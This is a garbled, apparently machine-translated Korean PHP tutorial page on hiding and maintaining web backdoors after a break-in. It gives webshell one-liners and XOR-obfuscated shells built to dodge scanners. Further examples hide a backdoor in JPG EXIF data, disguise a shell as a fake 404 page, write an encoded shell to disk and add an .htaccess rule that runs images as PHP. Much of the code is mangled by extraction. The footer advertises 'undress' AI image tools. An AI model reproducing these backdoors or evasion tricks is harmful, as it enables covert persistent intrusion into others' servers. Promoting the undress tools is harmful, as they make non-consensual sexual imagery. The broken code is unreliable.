찾다
백엔드 개발PHP 튜토리얼PHP 백도어 숨기기 및 유지 관리 기술

테스트에 성공한 후에는 일반적으로 권한을 더 오랫동안 유지하고 싶을 것입니다. 백도어를 떠나는 작업은 일반적으로 데이터베이스 권한, 웹 권한 및 시스템 사용자를 포함하지만 이에 국한되지는 않습니다. 등. 이 기사에서는 폭스바겐의 백도어에 숨겨진 몇 가지 아이디어를 대중화할 것입니다.

AD:

0×00 서문

테스트에 성공하고 나면 일반적으로 권한을 더 오래 유지하고 싶은 것이 백도어를 떠나는 작업인 것 같습니다. 매우 중요합니다. 일반적으로 배포되는 백도어에는 데이터베이스 권한, 웹 권한, 시스템 사용자 권한 등이 포함되지만 이에 국한되지는 않습니다. 이 기사에서는 공개 백도어에 숨겨진 몇 가지 아이디어를 대중화할 것입니다. 🎜>PHP-WEBBACKDOOR를 예로 들어 다른 사람들에게 영감을 주세요

가장 일반적인 한 문장 백도어는 다음과 같이 작성할 수 있습니다

eval(

$ _POST[

'cmd']);?>
  1. 또는 이
  2. $_POST[

    'cmd']);?>

    1. 물론 이는 For information이라는 함수만 다릅니다. PHP에 의해 비활성화된 기능에 대해서는 php.ini에서 검색: 비활성화_함수를 참조하십시오.그러나 운영 및 유지 관리를 위해
    과 같이 직관적으로 쉘을 찾을 수 있는 여러 가지 방법이 있습니다. Exception 발견 파일명/수정시간/크기, 파일 백업 비교

    ◆Scanbackdoor.php/Pecker/shellDetect.php 등 WEBSHELL 백도어 스캐닝 스크립트와 각종 스캐너 등을 통해 백도어를 발견합니다.

    ◆Access.log 접속 로그를 통해 백도어 발견

    ◆ 또는 WAF에 의해 테스트 문장이 차단되고 경고 로그가 전송되는 등의 현상이 발생합니다.

    일반적인 탐지 방법 중 셸을 숨기기 위한 일반적인 방법은 다음 7가지로 정리

    0×01 회피

    다양한 스캐닝 백도어 코드를 살펴보면 누구나 알고 있는 키워드를 남겨두고 셸에서는 소리 지르는 것이 절대 허용되지 않습니다

    다음과 같은 일반적인 키워드:

    ◆시스템 명령 실행: system, passthru, shell_exec, exec, popen, proc_open

    ◆코드 실행: eval, Assert , call_user_func, base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13

    ◆파일 포함: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite

    과거 $_POST[0]($_POST[1]) 친구가 명령을 실행하는 데 현명하게 사용했지만 안타깝게도 지금은 스캐너의 감지를 피하기가 어렵지만 모든 것이 변하고 있습니다. 그리고 구축 방법은 무궁무진합니다

    tudouya 동급생이 제공한 [FREEBUF 팁 구축](http://www.freebuf.com/articles/web/33824.html)

    @

    $_++;

    // $_ = 1
    1. $__=("#"^"|"); // $__ = _
    2. $__.=("."^"~"); // _P
    3. $__.=("/ "^"`"); // _PO
    4. $__.=("|"^"/"); // _POS
    5. $__.=("{"^" /"); // _POST
    6. ${$__}[!$_](${ $__}[$_])
    7. // $_POST[ 0]($_POST[1])
    8. ?> 건축세대는 물론 과하다 직관적으로 이렇게 쓰면 됩니다
    9. $_++ ;$__=(
    "#"^

    "|").(

    "."^
      "~").(
    1. "/"^ "`").("|"^"/").( "{"^"/");@${$__}[!$_](${$__}[$_]);?> 그런 다음 일반적인 코드를 작성하여 위장하고 간단한 "안티 킬"을 입력합니다. 셸 샘플이 나타납니다올바르게 실행되며 일반 스캐너를 우회합니다. 이를 사용하여 새 임시 셸을 작성할 수도 있습니다.

    0×02 기능

    명령을 실행하기 위해 구문 기능을 사용하는 것도 흥미로운 방법입니다. 변수를 처리할 때 PHP 문법 기능을 빌려 큰따옴표 안의 데이터에 변수가 포함되어 있는지 분석합니다. 값)

    예:

    ${@

    eval( phpinfo())}

    {}는 다음을 구문 분석할 수 있습니다. 큰따옴표 안의 변수 내용, @오류를 유지하고 실행 계속

      그런 다음 숨겨진 백도어 구성을 시작할 수 있지만 여기 구조는 함수로 인한 명령 실행에 의존하려고 합니다. 그렇습니다. preg_replace
    1. "//e",
    $ _POST[

    'cmd'],

    "");?>

    1. 이 게임 플레이는 분명히 스캐너 목록에 의해 해킹되었으며 간단한 수정
      1. function funfunc($str){}
      2. echo preg_replace("/(.+?)/ies", 'funfunc("1")', $_POST["cmd"])
      3. ?>

      을(를) 실행했는데 찾을 수 없습니다

      실행 방법은 명확합니다. 정규 매칭 {${phpinfo()}}가 funfunc에 전달되면 해당 코드가 실행됩니다.

      1. funfunc("{${phpinfo() }} ")

      다른 방법

      1. "$arr="".$_GET[ 'cmd']."";");?>

    0×03 포함

    파일 포함은 누구나 시도해 본 방법이지만 포함을 위한 기술도 있습니다

    일반적인 파일 포함은 단순히 특정 txt 또는 jpg를 포함하는 포함일 수도 있고, 심지어 포함을 직접 남겨도 취약점이지만 스캐너도 쉽게 찾을 수 있고, 추가로 포함된 파일도 쉽게 찾을 수 있습니다

    이 스크립트를 보세요

    1.  if (@isset($_GET[content]))
    2. {
    3. ,'w')  file_put_contents(
    4. 'README',
    5. " @file_put_contents(
    6. 'README',
    7. $_GET[content],FILE_APPEND) fclose( $fp)
    8. 'README';}
    9. ?> 일부 문제를 해결합니다. 필요에 따라 필요한 쉘을 생성한 다음 포함할 수 있습니다.
    안타깝게도 file_put_contents와 같은 함수는 너무 민감하기 때문에 이를 통해 쉽게 찾을 수도 있습니다. 스캐닝

    쉘은 액세스로 생성되는 인코딩 생성을 통해 생성됩니다.

    fputs(fopen(

    base64_decode(

    'cGx1Z2luX20ucGhw'),w),
      base64_decode(
    1. 'PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/Pg==')) ?> 은 일부 스캐너를 회피할 수 있지만 이 모드도 더욱 눈길을 끌고, 생성된 새 파일은 탐지되지 않도록 숨겨야 합니다.
    2. 의 물론 휴리스틱과 같은 새로운 개념은 고려되지 않습니다
    3. 이 방법이 요구 사항을 충족할 수 없으면 영리한 공격자가 다시 그림으로 돌아옵니다

    $exif=exif_read_data ('./lol.jpg');preg_replace(

    $exif[

    '만들기'],
      $exif[
    1. '모델'],''); ?> 참고: 1 JPG 이미지의 EXIF에 숨겨진 백도어 이번에는 이미지 말을 생성하기 위해 더 이상 단순히 /b를 복사할 필요가 없습니다. 또한 preg_replace 실행 파일의 특정 플래그를 빌릴 수도 있습니다.

    여기 정의되지 않은 함수를 호출하라는 메시지가 표시될 수 있습니다.

    에 이어 이 이미지 백도어는 preg_replace e 매개변수에 의존하고, PHP의 변수 구문 분석 실행에 의존하며, 마지막으로 파일 식별에 의존하여 이미지를 완성합니다. 쉘 어셈블리는 숨겨진 백도어를 처음 접하는 사람들에게 작은 알림입니다

    물론 포함 지점이 있는 한 포함 파일의 형식은 error_log를 포함하여 다양합니다(필요할 수도 있지만). 폐쇄를 고려), 예상치 못한 일만 있을 뿐입니다…

    0×04 Hidden

    방문자들이 백도어의 존재를 알아차리지 못하도록 영리한 보안 연구원들도 상황을 혼란스럽게 할 것입니다

    1. span>"-//IETF//DTD HTML 2.0//EN"> > 404 찾을 수 없음 🎜>
    2. / h1>
    3. 요청한 URL을 이 서버에서 찾을 수 없습니다.

      > 🎜>
    4. @preg_replace(
    5. "/[checksql]/e",
    6. $_POST[
    7. 'cmd'],
    8. "saft" ; 🎜>
    9. 그러나 많은 수의 로그에서 더 잘 숨길 수는 없습니다.
    10. & lt;? php
    11. 헤더 ( 'http/1.1 404'), 'cgx1z2lux20ugghw'),
    12. base64_decode ( 'pd9wahgfzc2vydcgkx1bpu1rbj2ntzcdkts = cg.
    13. ob_end_clean() ?> real 404 네, 로그에도 마찬가지입니다

    그런데 지금 이 순간 연결하려는 스크립트가 현재 디렉토리에 생성되었습니다

    0×05 혼란

      Weevely 도구를 사용해 본 사람들은 이것이 생성하는 안티 킬 쉘이 다음과 같다는 것을 알아야 합니다
    1.  
    2. $kthe=
    3. "JGEpPjgiMpeyRrPSgidwcyc7ZWNobyAnPCcgiugiJGsuJz4nOgi2V2YWwoYgimFzZTY0X2giRlY2gi9kgiZShwcmVn"                   place("w",""," stwrw_wrwepwlwawcwe");
    4.                                                        
     

    $zrmt=

    "JGM9J2NvdWgi50JzskgiYT0gikX0NgiPT0tJRgiTtpZihyZXNldCgkYSk9PSgidvbycggiJgiiYgJGMo"; ftdf(

    "f", "",

    "bfafsfef6f4_fdfefcodfe" )

                                      >"lclrlelaltel_functlilon"); (
    1. $ftdf(
    2. "gi",
    3. "", $zrmt.$kthe.$wmmi.$penh))); $rdwm();
    4. 터미널에 연결하면 이런 모습입니다
    5. Ps: 터미널 코드를 바꾸는 걸 깜빡했어요 스크린샷:(킬을 피하는 방법 고정된 영역에서 임의의 이름 변수를 생성한 다음 str_replace를 사용하여 base64_decode를 결합하고 명령을 실행하는 프로세스 물론 이것은 더 많은 것입니다. 스캐너를 피하기 위해 코드 수준에서 일반적인 난독화 시청각 방법: ◆파일 시간 수정◆업로드 후 이름을 바꾸고 폴더에 통합하므로 파일 이상을 사람이 눈으로 볼 수 없도록
    6. ◆가짜 파일 크기 처리(적어도 크기는 일반 스크립트처럼 보이도록)◆숨겨진 경로를 선택하고 가능한 한 적게 방문하세요◆변형된 디렉터리 %20
    7. 공간 디렉터리는 아직 상대적으로 쉽습니다. 발견된
    8. 0×06 파싱
    9. .htaccess를 사용하여 구문 분석 백도어 추가 as:AddType application/x-httpd-php .jpg
    10. 위 내용은 어디까지나 예시입니다0 ×07 기타

      위의 방법을 요약하면 대부분은 취약점을 구축하는 과정에 지나지 않습니다. 취약점을 구축하는 코드는 백도어만큼 이상할 수도 있고, 섬세하고 우아하게 작성할 수도 있습니다. 간단하고 투박하지만 적용되는 상황은 다릅니다. 아이디어를 잘 통합할 수 있다면 자신만의 숨겨진 쉘을 구성하는 것은 어렵지 않습니다. 위 내용은 단지 경험을 요약한 것입니다. 여러분의 생각을 공유해 보세요.

      위 내용은 관련 내용을 포함하여 PHP 백도어 숨기기 및 유지 관리 기술을 소개하고 있으며, PHP 튜토리얼에 관심이 있는 친구들에게 도움이 되기를 바랍니다.

성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
PHP의 목적 : 동적 웹 사이트 구축PHP의 목적 : 동적 웹 사이트 구축Apr 15, 2025 am 12:18 AM

PHP는 동적 웹 사이트를 구축하는 데 사용되며 해당 핵심 기능에는 다음이 포함됩니다. 1. 데이터베이스와 연결하여 동적 컨텐츠를 생성하고 웹 페이지를 실시간으로 생성합니다. 2. 사용자 상호 작용 및 양식 제출을 처리하고 입력을 확인하고 작업에 응답합니다. 3. 개인화 된 경험을 제공하기 위해 세션 및 사용자 인증을 관리합니다. 4. 성능을 최적화하고 모범 사례를 따라 웹 사이트 효율성 및 보안을 개선하십시오.

PHP : 데이터베이스 및 서버 측 로직 처리PHP : 데이터베이스 및 서버 측 로직 처리Apr 15, 2025 am 12:15 AM

PHP는 MySQLI 및 PDO 확장 기능을 사용하여 데이터베이스 작업 및 서버 측 로직 프로세싱에서 상호 작용하고 세션 관리와 같은 기능을 통해 서버 측로 로직을 처리합니다. 1) MySQLI 또는 PDO를 사용하여 데이터베이스에 연결하고 SQL 쿼리를 실행하십시오. 2) 세션 관리 및 기타 기능을 통해 HTTP 요청 및 사용자 상태를 처리합니다. 3) 트랜잭션을 사용하여 데이터베이스 작업의 원자력을 보장하십시오. 4) SQL 주입 방지, 디버깅을 위해 예외 처리 및 폐쇄 연결을 사용하십시오. 5) 인덱싱 및 캐시를 통해 성능을 최적화하고, 읽을 수있는 코드를 작성하고, 오류 처리를 수행하십시오.

PHP에서 SQL 주입을 어떻게 방지합니까? (준비된 진술, pdo)PHP에서 SQL 주입을 어떻게 방지합니까? (준비된 진술, pdo)Apr 15, 2025 am 12:15 AM

PHP에서 전처리 문과 PDO를 사용하면 SQL 주입 공격을 효과적으로 방지 할 수 있습니다. 1) PDO를 사용하여 데이터베이스에 연결하고 오류 모드를 설정하십시오. 2) 준비 방법을 통해 전처리 명세서를 작성하고 자리 표시자를 사용하여 데이터를 전달하고 방법을 실행하십시오. 3) 쿼리 결과를 처리하고 코드의 보안 및 성능을 보장합니다.

PHP 및 Python : 코드 예제 및 비교PHP 및 Python : 코드 예제 및 비교Apr 15, 2025 am 12:07 AM

PHP와 Python은 고유 한 장점과 단점이 있으며 선택은 프로젝트 요구와 개인 선호도에 달려 있습니다. 1.PHP는 대규모 웹 애플리케이션의 빠른 개발 및 유지 보수에 적합합니다. 2. Python은 데이터 과학 및 기계 학습 분야를 지배합니다.

PHP 실행 : 실제 예제 및 응용 프로그램PHP 실행 : 실제 예제 및 응용 프로그램Apr 14, 2025 am 12:19 AM

PHP는 전자 상거래, 컨텐츠 관리 시스템 및 API 개발에 널리 사용됩니다. 1) 전자 상거래 : 쇼핑 카트 기능 및 지불 처리에 사용됩니다. 2) 컨텐츠 관리 시스템 : 동적 컨텐츠 생성 및 사용자 관리에 사용됩니다. 3) API 개발 : 편안한 API 개발 및 API 보안에 사용됩니다. 성능 최적화 및 모범 사례를 통해 PHP 애플리케이션의 효율성과 유지 보수 성이 향상됩니다.

PHP : 대화식 웹 컨텐츠를 쉽게 만들 수 있습니다PHP : 대화식 웹 컨텐츠를 쉽게 만들 수 있습니다Apr 14, 2025 am 12:15 AM

PHP를 사용하면 대화식 웹 컨텐츠를 쉽게 만들 수 있습니다. 1) HTML을 포함하여 컨텐츠를 동적으로 생성하고 사용자 입력 또는 데이터베이스 데이터를 기반으로 실시간으로 표시합니다. 2) 프로세스 양식 제출 및 동적 출력을 생성하여 htmlspecialchars를 사용하여 XSS를 방지합니다. 3) MySQL을 사용하여 사용자 등록 시스템을 작성하고 Password_Hash 및 전처리 명세서를 사용하여 보안을 향상시킵니다. 이러한 기술을 마스터하면 웹 개발의 효율성이 향상됩니다.

PHP 및 Python : 두 가지 인기있는 프로그래밍 언어를 비교합니다PHP 및 Python : 두 가지 인기있는 프로그래밍 언어를 비교합니다Apr 14, 2025 am 12:13 AM

PHP와 Python은 각각 고유 한 장점이 있으며 프로젝트 요구 사항에 따라 선택합니다. 1.PHP는 웹 개발, 특히 웹 사이트의 빠른 개발 및 유지 보수에 적합합니다. 2. Python은 간결한 구문을 가진 데이터 과학, 기계 학습 및 인공 지능에 적합하며 초보자에게 적합합니다.

PHP의 지속적인 관련성 : 여전히 살아 있습니까?PHP의 지속적인 관련성 : 여전히 살아 있습니까?Apr 14, 2025 am 12:12 AM

PHP는 여전히 역동적이며 현대 프로그래밍 분야에서 여전히 중요한 위치를 차지하고 있습니다. 1) PHP의 단순성과 강력한 커뮤니티 지원으로 인해 웹 개발에 널리 사용됩니다. 2) 유연성과 안정성은 웹 양식, 데이터베이스 작업 및 파일 처리를 처리하는 데 탁월합니다. 3) PHP는 지속적으로 발전하고 최적화하며 초보자 및 숙련 된 개발자에게 적합합니다.

See all articles

핫 AI 도구

Undresser.AI Undress

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

Clothoff.io

AI 옷 제거제

AI Hentai Generator

AI Hentai Generator

AI Hentai를 무료로 생성하십시오.

인기 기사

R.E.P.O. 에너지 결정과 그들이하는 일 (노란색 크리스탈)
4 몇 주 전By尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. 최고의 그래픽 설정
4 몇 주 전By尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. 아무도들을 수없는 경우 오디오를 수정하는 방법
4 몇 주 전By尊渡假赌尊渡假赌尊渡假赌
WWE 2K25 : Myrise에서 모든 것을 잠금 해제하는 방법
1 몇 달 전By尊渡假赌尊渡假赌尊渡假赌

뜨거운 도구

SublimeText3 중국어 버전

SublimeText3 중국어 버전

중국어 버전, 사용하기 매우 쉽습니다.

Atom Editor Mac 버전 다운로드

Atom Editor Mac 버전 다운로드

가장 인기 있는 오픈 소스 편집기

VSCode Windows 64비트 다운로드

VSCode Windows 64비트 다운로드

Microsoft에서 출시한 강력한 무료 IDE 편집기

스튜디오 13.0.1 보내기

스튜디오 13.0.1 보내기

강력한 PHP 통합 개발 환경

DVWA

DVWA

DVWA(Damn Vulnerable Web App)는 매우 취약한 PHP/MySQL 웹 애플리케이션입니다. 주요 목표는 보안 전문가가 법적 환경에서 자신의 기술과 도구를 테스트하고, 웹 개발자가 웹 응용 프로그램 보안 프로세스를 더 잘 이해할 수 있도록 돕고, 교사/학생이 교실 환경 웹 응용 프로그램에서 가르치고 배울 수 있도록 돕는 것입니다. 보안. DVWA의 목표는 다양한 난이도의 간단하고 간단한 인터페이스를 통해 가장 일반적인 웹 취약점 중 일부를 연습하는 것입니다. 이 소프트웨어는